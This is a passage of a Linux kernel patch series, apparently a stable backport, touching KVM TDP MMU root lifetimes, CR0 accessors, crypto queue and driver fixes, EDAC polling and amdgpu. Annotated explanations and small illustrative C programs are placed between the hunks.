++	 * TDP MMU roots are kept until they are explicitly invalidated, either
++	 * by a memslot update or by the destruction of the VM.  Initialize the
++	 * refcount to two; one reference for the vCPU, and one reference for
++	 * the TDP MMU itself, which is held until the root is invalidated and
++	 * is ultimately put by tdp_mmu_zap_root_work().
++	 */
++	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_add_rcu(&root->link, &kvm->arch.tdp_mmu_roots);
+@@ -1033,32 +996,49 @@ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously, so a reference is taken on all roots.
+- * Using a separate workqueue makes it easy to ensure that the destruction is
+- * performed before the "fast zap" completes, without keeping a separate list
+- * of invalidated roots; the list is effectively the list of work items in
+- * the workqueue.
+- *
+- * Get a reference even if the root is already invalid, the asynchronous worker
+- * assumes it was gifted a reference to the root it processes.  Because mmu_lock
+- * is held for write, it should be impossible to observe a root with zero refcount,
+- * i.e. the list of roots cannot be stale.
++ * zapping is performed asynchronously.  Using a separate workqueue makes it
++ * easy to ensure that the destruction is performed before the "fast zap"
++ * completes, without keeping a separate list of invalidated roots; the list is
++ * effectively the list of work items in the workqueue.
+  *
+- * This has essentially the same effect for the TDP MMU
+- * as updating mmu_valid_gen does for the shadow MMU.
++ * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	lockdep_assert_held_write(&kvm->mmu_lock);
+-	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
+-		if (!root->role.invalid &&
+-		    !WARN_ON_ONCE(!kvm_tdp_mmu_get_root(root))) {
++	/*
++	 * mmu_lock must be held for write to ensure that a root doesn't become
++	 * invalid while there are active readers (invalidating a root while
++	 * there are active readers may or may not be problematic in practice,
++	 * but it's uncharted territory and not supported).
++	 *
++	 * Waive the assertion if there are no users of @kvm, i.e. the VM is
++	 * being destroyed after all references have been put, or if no vCPUs
++	 * have been created (which means there are no roots), i.e. the VM is
++	 * being destroyed in an error path of KVM_CREATE_VM.
++	 */
++	if (IS_ENABLED(CONFIG_PROVE_LOCKING) &&
++	    refcount_read(&kvm->users_count) && kvm->created_vcpus)
++		lockdep_assert_held_write(&kvm->mmu_lock);
++
++	/*
++	 * As above, mmu_lock isn't held when destroying the VM!  There can't
++	 * be other references to @kvm, i.e. nothing else can invalidate roots
++	 * or be consuming roots, but walking the list of roots does need to be
++	 * guarded against roots being deleted by the asynchronous zap worker.
++	 */
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++		if (!root->role.invalid) {
+ 			root->role.invalid = true;
+ 			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
++
++	rcu_read_unlock();
+ }
+ 
+ /*
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index d3714200b932a..e4ab2dac269d6 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -7,6 +7,9 @@
+ 
+ #include "spte.h"
+ 
++int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
++void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
++
+ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu);
+ 
+ __must_check static inline bool kvm_tdp_mmu_get_root(struct kvm_mmu_page *root)
+@@ -68,8 +71,6 @@ u64 *kvm_tdp_mmu_fast_pf_get_last_sptep(struct kvm_vcpu *vcpu, u64 addr,
+ 					u64 *spte);
+ 
+ #ifdef CONFIG_X86_64
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
+-void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return sp->tdp_mmu_page; }
+ 
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+@@ -89,8 +90,6 @@ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+ 	return sp && is_tdp_mmu_page(sp) && sp->root_count;
+ }
+ #else
+-static inline int kvm_mmu_init_tdp_mmu(struct kvm *kvm) { return 0; }
+-static inline void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm) {}
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return false; }
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu) { return false; }
+ #endif
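The root-lifetime rework above replaces the mark-invalid-then-resurrect
dance with a simpler invariant: every root starts with a refcount of two,
one for the creating vCPU and one held by the TDP MMU itself until
invalidation gifts it to the zap worker, so a valid root can never hit
zero underneath a reader. A standalone sketch of that ownership scheme
(C11 atomics, hypothetical object):

#include <stdatomic.h>
#include <stdlib.h>

struct root {
	atomic_int refcount;
	int invalid;
};

static struct root *root_create(void)
{
	struct root *r = calloc(1, sizeof(*r));

	/* one reference for the creator, one for the subsystem itself */
	atomic_init(&r->refcount, 2);
	return r;
}

static void root_put(struct root *r)
{
	/* the final put can only follow invalidation, so a valid root
	 * never reaches zero while readers might still pick it up */
	if (atomic_fetch_sub(&r->refcount, 1) == 1)
		free(r);
}

static void root_invalidate(struct root *r)
{
	r->invalid = 1;
	root_put(r);	/* drop the subsystem's own reference */
}

int main(void)
{
	struct root *r = root_create();

	root_invalidate(r);	/* e.g. memslot update or VM teardown */
	root_put(r);		/* creator's reference; frees the root */
	return 0;
}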
+diff --git a/arch/x86/kvm/pmu.c b/arch/x86/kvm/pmu.c
+index eb594620dd75a..8be583a05de70 100644
+--- a/arch/x86/kvm/pmu.c
++++ b/arch/x86/kvm/pmu.c
+@@ -438,9 +438,9 @@ int kvm_pmu_rdpmc(struct kvm_vcpu *vcpu, unsigned idx, u64 *data)
+ 	if (!pmc)
+ 		return 1;
+ 
+-	if (!(kvm_read_cr4(vcpu) & X86_CR4_PCE) &&
++	if (!(kvm_read_cr4_bits(vcpu, X86_CR4_PCE)) &&
+ 	    (static_call(kvm_x86_get_cpl)(vcpu) != 0) &&
+-	    (kvm_read_cr0(vcpu) & X86_CR0_PE))
++	    (kvm_read_cr0_bits(vcpu, X86_CR0_PE)))
+ 		return 1;
+ 
+ 	*data = pmc_read_counter(pmc) & mask;
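The switch from kvm_read_cr0()/kvm_read_cr4() to the masked _bits()
accessors here and in the vmx.c hunks below is load-bearing: with CR0.WP
now potentially guest-owned, the cached CR0 may be stale, and the masked
accessors only reach out to the VMCS when a requested bit is both
guest-owned and flagged unavailable. Approximately (a paraphrase of the
kvm_cache_regs.h accessor, not a verbatim quote):

static __always_inline ulong kvm_read_cr0_bits(struct kvm_vcpu *vcpu, ulong mask)
{
	ulong tmask = mask & KVM_POSSIBLE_CR0_GUEST_BITS;

	/* only bits the guest can own may be stale in the cache */
	if ((tmask & vcpu->arch.cr0_guest_owned_bits) &&
	    !kvm_register_is_available(vcpu, VCPU_EXREG_CR0))
		static_call(kvm_x86_cache_reg)(vcpu, VCPU_EXREG_CR0);

	return vcpu->arch.cr0 & mask;
}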
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index b7f2e59d50ee4..579ceaf75dde7 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4488,7 +4488,7 @@ static void load_vmcs12_host_state(struct kvm_vcpu *vcpu,
+ 	 * CR0_GUEST_HOST_MASK is already set in the original vmcs01
+ 	 * (KVM doesn't change it);
+ 	 */
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs12->host_cr0);
+ 
+ 	/* Same as above - no reason to call set_cr4_guest_host_mask().  */
+@@ -4639,7 +4639,7 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
+ 	 */
+ 	vmx_set_efer(vcpu, nested_vmx_get_vmcs01_guest_efer(vmx));
+ 
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs_readl(CR0_READ_SHADOW));
+ 
+ 	vcpu->arch.cr4_guest_owned_bits = ~vmcs_readl(CR4_GUEST_HOST_MASK);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 53034045cb6e6..57a73954980ac 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -4728,7 +4728,7 @@ static void init_vmcs(struct vcpu_vmx *vmx)
+ 	/* 22.2.1, 20.8.1 */
+ 	vm_entry_controls_set(vmx, vmx_vmentry_ctrl());
+ 
+-	vmx->vcpu.arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vmx->vcpu.arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmcs_writel(CR0_GUEST_HOST_MASK, ~vmx->vcpu.arch.cr0_guest_owned_bits);
+ 
+ 	set_cr4_guest_host_mask(vmx);
+@@ -5450,7 +5450,7 @@ static int handle_cr(struct kvm_vcpu *vcpu)
+ 		break;
+ 	case 3: /* lmsw */
+ 		val = (exit_qualification >> LMSW_SOURCE_DATA_SHIFT) & 0x0f;
+-		trace_kvm_cr_write(0, (kvm_read_cr0(vcpu) & ~0xful) | val);
++		trace_kvm_cr_write(0, (kvm_read_cr0_bits(vcpu, ~0xful) | val));
+ 		kvm_lmsw(vcpu, val);
+ 
+ 		return kvm_skip_emulated_instruction(vcpu);
+@@ -7531,7 +7531,7 @@ static u8 vmx_get_mt_mask(struct kvm_vcpu *vcpu, gfn_t gfn, bool is_mmio)
+ 	if (!kvm_arch_has_noncoherent_dma(vcpu->kvm))
+ 		return (MTRR_TYPE_WRBACK << VMX_EPT_MT_EPTE_SHIFT) | VMX_EPT_IPAT_BIT;
+ 
+-	if (kvm_read_cr0(vcpu) & X86_CR0_CD) {
++	if (kvm_read_cr0_bits(vcpu, X86_CR0_CD)) {
+ 		if (kvm_check_has_quirk(vcpu->kvm, KVM_X86_QUIRK_CD_NW_CLEARED))
+ 			cache = MTRR_TYPE_WRBACK;
+ 		else
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index a3da84f4ea456..e2b04f4c0fef3 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -640,6 +640,24 @@ BUILD_CONTROLS_SHADOW(tertiary_exec, TERTIARY_VM_EXEC_CONTROL, 64)
+ 				(1 << VCPU_EXREG_EXIT_INFO_1) | \
+ 				(1 << VCPU_EXREG_EXIT_INFO_2))
+ 
++static inline unsigned long vmx_l1_guest_owned_cr0_bits(void)
++{
++	unsigned long bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++
++	/*
++	 * CR0.WP needs to be intercepted when KVM is shadowing legacy paging
++	 * in order to construct shadow PTEs with the correct protections.
++	 * Note!  CR0.WP technically can be passed through to the guest if
++	 * paging is disabled, but checking CR0.PG would generate a cyclical
++	 * dependency of sorts due to forcing the caller to ensure CR0 holds
++	 * the correct value prior to determining which CR0 bits can be owned
++	 * by L1.  Keep it simple and limit the optimization to EPT.
++	 */
++	if (!enable_ept)
++		bits &= ~X86_CR0_WP;
++	return bits;
++}
++
+ static inline struct kvm_vmx *to_kvm_vmx(struct kvm *kvm)
+ {
+ 	return container_of(kvm, struct kvm_vmx, kvm);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 2d76c254582b0..35cd87a326ace 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -904,6 +904,18 @@ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
++	/*
++	 * CR0.WP is incorporated into the MMU role, but only for non-nested,
++	 * indirect shadow MMUs.  If TDP is enabled, the MMU's metadata needs
++	 * to be updated, e.g. so that emulating guest translations does the
++	 * right thing, but there's no need to unload the root as CR0.WP
++	 * doesn't affect SPTEs.
++	 */
++	if (tdp_enabled && (cr0 ^ old_cr0) == X86_CR0_WP) {
++		kvm_init_mmu(vcpu);
++		return;
++	}
++
+ 	if ((cr0 ^ old_cr0) & X86_CR0_PG) {
+ 		kvm_clear_async_pf_completion_queue(vcpu);
+ 		kvm_async_pf_hash_reset(vcpu);
+diff --git a/arch/x86/lib/clear_page_64.S b/arch/x86/lib/clear_page_64.S
+index ecbfb4dd3b019..faa4cdc747a3e 100644
+--- a/arch/x86/lib/clear_page_64.S
++++ b/arch/x86/lib/clear_page_64.S
+@@ -142,8 +142,8 @@ SYM_FUNC_START(clear_user_rep_good)
+ 	and $7, %edx
+ 	jz .Lrep_good_exit
+ 
+-.Lrep_good_bytes:
+ 	mov %edx, %ecx
++.Lrep_good_bytes:
+ 	rep stosb
+ 
+ .Lrep_good_exit:
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 5f61c65322bea..22fc313c65004 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -144,8 +144,8 @@ SYM_CODE_END(__x86_indirect_jump_thunk_array)
+  */
+ 	.align 64
+ 	.skip 63, 0xcc
+-SYM_FUNC_START_NOALIGN(zen_untrain_ret);
+-
++SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
+ 	/*
+ 	 * As executed from zen_untrain_ret, this is:
+ 	 *
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 9ac1efb053e08..2d8a28e4e22f7 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -501,6 +501,9 @@ restart:
+ 	list_for_each_entry_safe(blkg, n, &q->blkg_list, q_node) {
+ 		struct blkcg *blkcg = blkg->blkcg;
+ 
++		if (hlist_unhashed(&blkg->blkcg_node))
++			continue;
++
+ 		spin_lock(&blkcg->lock);
+ 		blkg_destroy(blkg);
+ 		spin_unlock(&blkcg->lock);
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 9de0677b3643d..60b98d2c400e3 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -963,6 +963,9 @@ EXPORT_SYMBOL_GPL(crypto_enqueue_request);
+ void crypto_enqueue_request_head(struct crypto_queue *queue,
+ 				 struct crypto_async_request *request)
+ {
++	if (unlikely(queue->qlen >= queue->max_qlen))
++		queue->backlog = queue->backlog->prev;
++
+ 	queue->qlen++;
+ 	list_add(&request->list, &queue->list);
+ }
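The crypto_enqueue_request_head() fix accounts for head insertion on a
full queue: requests beyond max_qlen live on the backlog, whose start is
tracked by queue->backlog, and inserting at the head of a full queue
pushes the last in-budget request into backlog territory, so the cursor
must step back one node to keep pointing at the first backlogged entry.
A standalone demonstration with a toy circular doubly linked list
(hypothetical names, not the crypto API):

#include <stdio.h>

struct node { struct node *prev, *next; const char *name; };

/* insert n right behind head in a circular doubly linked list */
static void list_add_head(struct node *head, struct node *n)
{
	n->prev = head;
	n->next = head->next;
	head->next->prev = n;
	head->next = n;
}

int main(void)
{
	struct node head = { &head, &head, "head" };
	struct node a = { .name = "reqA" }, b = { .name = "reqB" },
		    c = { .name = "reqC" }, n = { .name = "new" };
	struct node *backlog;

	/* max_qlen == 2: reqA and reqB are pending, reqC is backlogged */
	list_add_head(&head, &c);
	list_add_head(&head, &b);
	list_add_head(&head, &a);
	backlog = &c;

	/* head-insert while already over max_qlen: reqB is pushed into
	 * backlog territory, so step the cursor back one node first,
	 * the same backlog->prev adjustment the patch adds */
	backlog = backlog->prev;
	list_add_head(&head, &n);

	printf("backlog now starts at %s\n", backlog->name);	/* reqB */
	return 0;
}

The one-step adjustment is also right when the backlog was previously
empty: the cursor then sits on the list-head sentinel, whose prev is the
tail, i.e. exactly the request that just became backlogged.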
+diff --git a/crypto/crypto_engine.c b/crypto/crypto_engine.c
+index bb8e77077f020..50bac2ab55f17 100644
+--- a/crypto/crypto_engine.c
++++ b/crypto/crypto_engine.c
+@@ -54,7 +54,7 @@ static void crypto_finalize_request(struct crypto_engine *engine,
+ 		}
+ 	}
+ 	lockdep_assert_in_softirq();
+-	req->complete(req, err);
++	crypto_request_complete(req, err);
+ 
+ 	kthread_queue_work(engine->kworker, &engine->pump_requests);
+ }
+@@ -129,9 +129,6 @@ start_request:
+ 	if (!engine->retry_support)
+ 		engine->cur_req = async_req;
+ 
+-	if (backlog)
+-		backlog->complete(backlog, -EINPROGRESS);
+-
+ 	if (engine->busy)
+ 		was_busy = true;
+ 	else
+@@ -214,9 +211,12 @@ req_err_1:
+ 	}
+ 
+ req_err_2:
+-	async_req->complete(async_req, ret);
++	crypto_request_complete(async_req, ret);
+ 
+ retry:
++	if (backlog)
++		crypto_request_complete(backlog, -EINPROGRESS);
++
+ 	/* If retry mechanism is supported, send new requests to engine */
+ 	if (engine->retry_support) {
+ 		spin_lock_irqsave(&engine->queue_lock, flags);
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 902f6be057ec6..e97fb203690ae 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -151,7 +151,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 		}
+ 		rctx->p_iv[i] = a;
+ 		/* we need to setup all others IVs only in the decrypt way */
+-		if (rctx->op_dir & SS_ENCRYPTION)
++		if (rctx->op_dir == SS_ENCRYPTION)
+ 			return 0;
+ 		todo = min(len, sg_dma_len(sg));
+ 		len -= todo;
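The one-character sun8i-ss fix swaps a bitwise test for an equality test:
op_dir holds exactly one direction value, and probing such a field with &
misfires whenever the tested constant is zero or the encodings share
bits. A tiny standalone illustration of the pitfall (the constants here
are hypothetical, not the driver's):

#include <stdio.h>

#define DIR_ENCRYPT 0x0	/* note the zero-valued "flag" */
#define DIR_DECRYPT 0x1

int main(void)
{
	int op_dir = DIR_ENCRYPT;

	if (op_dir & DIR_ENCRYPT)	/* x & 0 is never true */
		puts("& thinks this is encryption");
	if (op_dir == DIR_ENCRYPT)	/* correct test for a one-of value */
		puts("== correctly sees encryption");
	return 0;
}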
+diff --git a/drivers/crypto/ccp/psp-dev.c b/drivers/crypto/ccp/psp-dev.c
+index c9c741ac84421..949a3fa0b94a9 100644
+--- a/drivers/crypto/ccp/psp-dev.c
++++ b/drivers/crypto/ccp/psp-dev.c
+@@ -42,6 +42,9 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 	/* Read the interrupt status: */
+ 	status = ioread32(psp->io_regs + psp->vdata->intsts_reg);
+ 
++	/* Clear the interrupt status by writing the same value we read. */
++	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
++
+ 	/* invoke subdevice interrupt handlers */
+ 	if (status) {
+ 		if (psp->sev_irq_handler)
+@@ -51,9 +54,6 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 			psp->tee_irq_handler(irq, psp->tee_irq_data, status);
+ 	}
+ 
+-	/* Clear the interrupt status by writing the same value we read. */
+-	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
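The psp-dev.c reorder applies the usual ack-before-handle rule for latched
interrupt status: clear the status register before running the subdevice
handlers, so an event arriving while a handler runs re-latches its bit
and raises a fresh interrupt instead of being wiped by a late ack. A
minimal simulation of the ordering (fake MMIO helpers, not the ccp API):

#include <stdint.h>
#include <stdio.h>

static uint32_t fake_intsts;	/* stands in for the MMIO status register */

static uint32_t ioread32_sim(void) { return fake_intsts; }
static void iowrite32_sim(uint32_t v) { fake_intsts &= ~v; }	/* write-1-to-clear */

static void psp_style_irq(void)
{
	uint32_t status = ioread32_sim();

	/* Ack first: an event latching while the handlers below run
	 * re-sets its status bit and raises another interrupt rather
	 * than being silently cleared afterwards. */
	iowrite32_sim(status);

	if (status & 0x1)
		puts("sev event handled");
	if (status & 0x2)
		puts("tee event handled");
}

int main(void)
{
	fake_intsts = 0x3;
	psp_style_irq();
	printf("status register now %#x\n", fake_intsts);
	return 0;
}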
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index c45519f59dc11..2c91ceff8a9ca 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -76,6 +76,8 @@
+ #define DRP0_INTERRUPT_ENABLE           BIT(6)
+ #define SB_DB_DRP_INTERRUPT_ENABLE      0x3
+ 
++#define ECC_POLL_MSEC			5000
++
+ enum {
+ 	LLCC_DRAM_CE = 0,
+ 	LLCC_DRAM_UE,
+@@ -285,8 +287,7 @@ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ 	return ret;
+ }
+ 
+-static irqreturn_t
+-llcc_ecc_irq_handler(int irq, void *edev_ctl)
++static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+ 	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+@@ -332,6 +333,11 @@ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 	return irq_rc;
+ }
+ 
++static void llcc_ecc_check(struct edac_device_ctl_info *edev_ctl)
++{
++	llcc_ecc_irq_handler(0, edev_ctl);
++}
++
+ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ {
+ 	struct llcc_drv_data *llcc_driv_data = pdev->dev.platform_data;
+@@ -359,29 +365,31 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+ 
+-	rc = edac_device_add_device(edev_ctl);
+-	if (rc)
+-		goto out_mem;
+-
+-	platform_set_drvdata(pdev, edev_ctl);
+-
+-	/* Request for ecc irq */
++	/* Check if LLCC driver has passed ECC IRQ */
+ 	ecc_irq = llcc_driv_data->ecc_irq;
+-	if (ecc_irq < 0) {
+-		rc = -ENODEV;
+-		goto out_dev;
+-	}
+-	rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
++	if (ecc_irq > 0) {
++		/* Use interrupt mode if IRQ is available */
++		rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
+ 			      IRQF_TRIGGER_HIGH, "llcc_ecc", edev_ctl);
+-	if (rc)
+-		goto out_dev;
++		if (!rc) {
++			edac_op_state = EDAC_OPSTATE_INT;
++			goto irq_done;
++		}
++	}
+ 
+-	return rc;
++	/* Fall back to polling mode otherwise */
++	edev_ctl->poll_msec = ECC_POLL_MSEC;
++	edev_ctl->edac_check = llcc_ecc_check;
++	edac_op_state = EDAC_OPSTATE_POLL;
+ 
+-out_dev:
+-	edac_device_del_device(edev_ctl->dev);
+-out_mem:
+-	edac_device_free_ctl_info(edev_ctl);
++irq_done:
++	rc = edac_device_add_device(edev_ctl);
++	if (rc) {
++		edac_device_free_ctl_info(edev_ctl);
++		return rc;
++	}
++
++	platform_set_drvdata(pdev, edev_ctl);
+ 
+ 	return rc;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 7af3041ccd0e8..40e8da85f04fe 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -1274,7 +1274,7 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 		r = drm_sched_job_add_dependency(&leader->base, fence);
+ 		if (r) {
+ 			dma_fence_put(fence);
+-			goto error_cleanup;
++			return r;
+ 		}
+ 	}
+ 
+@@ -1301,7 +1301,8 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 	}
+ 	if (r) {
+ 		r = -EAGAIN;
+-		goto error_unlock;
++		mutex_unlock(&p->adev->notifier_lock);
++		return r;
+ 	}
+ 
+ 	p->fence = dma_fence_get(&leader->base.s_fence->finished);
+@@ -1348,14 +1349,6 @@ static int amdgpu_cs_submit(struct amdgpu_cs_parser *p,
+ 	mutex_unlock(&p->adev->notifier_lock);
+ 	mutex_unlock(&p->bo_list->bo_list_mutex);
+ 	return 0;
+-
+-error_unlock:
+-	mutex_unlock(&p->adev->notifier_lock);
+-
+-error_cleanup:
+-	for (i = 0; i < p->gang_size; ++i)
+-		drm_sched_job_cleanup(&p->jobs[i]->base);
+-	return r;
+ }
+ 
+ /* Cleanup the parser structure */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 533263d442657..8a14202f86134 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4503,7 +4503,11 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 	dev_info(adev->dev, "recover vram bo from shadow start\n");
+ 	mutex_lock(&adev->shadow_list_lock);
+ 	list_for_each_entry(vmbo, &adev->shadow_list, shadow_list) {
+-		shadow = &vmbo->bo;
++		/* If vm is compute context or adev is APU, shadow will be NULL */
++		if (!vmbo->shadow)
++			continue;
++		shadow = vmbo->shadow;
++
+ 		/* No need to recover an evicted BO */
+ 		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 0c546245793b9..82e27bd4f0383 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -21,6 +21,8 @@
+  *
+  */
+ 
++#include <linux/firmware.h>
++
+ #include "amdgpu_mes.h"
+ #include "amdgpu.h"
+ #include "soc15_common.h"
+@@ -1423,3 +1425,60 @@ error_pasid:
+ 	kfree(vm);
+ 	return 0;
+ }
++
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
++{
++	const struct mes_firmware_header_v1_0 *mes_hdr;
++	struct amdgpu_firmware_info *info;
++	char ucode_prefix[30];
++	char fw_name[40];
++	int r;
++
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
++	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++		ucode_prefix,
++		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r)
++		goto out;
++
++	mes_hdr = (const struct mes_firmware_header_v1_0 *)
++		adev->mes.fw[pipe]->data;
++	adev->mes.uc_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_uc_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_uc_start_addr_hi)) << 32);
++	adev->mes.data_start_addr[pipe] =
++		le32_to_cpu(mes_hdr->mes_data_start_addr_lo) |
++		((uint64_t)(le32_to_cpu(mes_hdr->mes_data_start_addr_hi)) << 32);
++
++	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
++		int ucode, ucode_data;
++
++		if (pipe == AMDGPU_MES_SCHED_PIPE) {
++			ucode = AMDGPU_UCODE_ID_CP_MES;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES_DATA;
++		} else {
++			ucode = AMDGPU_UCODE_ID_CP_MES1;
++			ucode_data = AMDGPU_UCODE_ID_CP_MES1_DATA;
++		}
++
++		info = &adev->firmware.ucode[ucode];
++		info->ucode_id = ucode;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_size_bytes),
++			      PAGE_SIZE);
++
++		info = &adev->firmware.ucode[ucode_data];
++		info->ucode_id = ucode_data;
++		info->fw = adev->mes.fw[pipe];
++		adev->firmware.fw_size +=
++			ALIGN(le32_to_cpu(mes_hdr->mes_ucode_data_size_bytes),
++			      PAGE_SIZE);
++	}
++
++	return 0;
++out:
++	amdgpu_ucode_release(&adev->mes.fw[pipe]);
++	return r;
++}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+index 97c05d08a551a..547ec35691fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.h
+@@ -306,6 +306,7 @@ struct amdgpu_mes_funcs {
+ 
+ int amdgpu_mes_ctx_get_offs(struct amdgpu_ring *ring, unsigned int id_offs);
+ 
++int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe);
+ int amdgpu_mes_init(struct amdgpu_device *adev);
+ void amdgpu_mes_fini(struct amdgpu_device *adev);
+ 
